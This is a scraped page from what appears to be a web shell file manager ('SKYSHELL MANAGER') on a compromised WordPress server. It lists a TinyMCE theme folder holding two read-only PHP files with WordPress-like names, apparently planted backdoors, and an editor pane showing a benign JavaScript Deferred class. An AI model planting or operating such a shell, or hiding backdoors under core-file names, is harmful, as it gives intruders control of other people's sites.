📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.js
/** * A handle around a Promise, so it may be resolved or * rejected from outside the Promise constructor. */ export class Deferred { /** * Resolve the promise */ resolve; /** * Reject the promise */ reject; /** * The promise that gets resolved or rejected */ promise = new Promise((res, rej) => { this.resolve = res; this.reject = rej; }); /** * static reference to the class, so that * require('trivial-deferred').Deferred works */ static get Deferred() { return Deferred; } } export default Deferred; //# sourceMappingURL=index.js.map
Save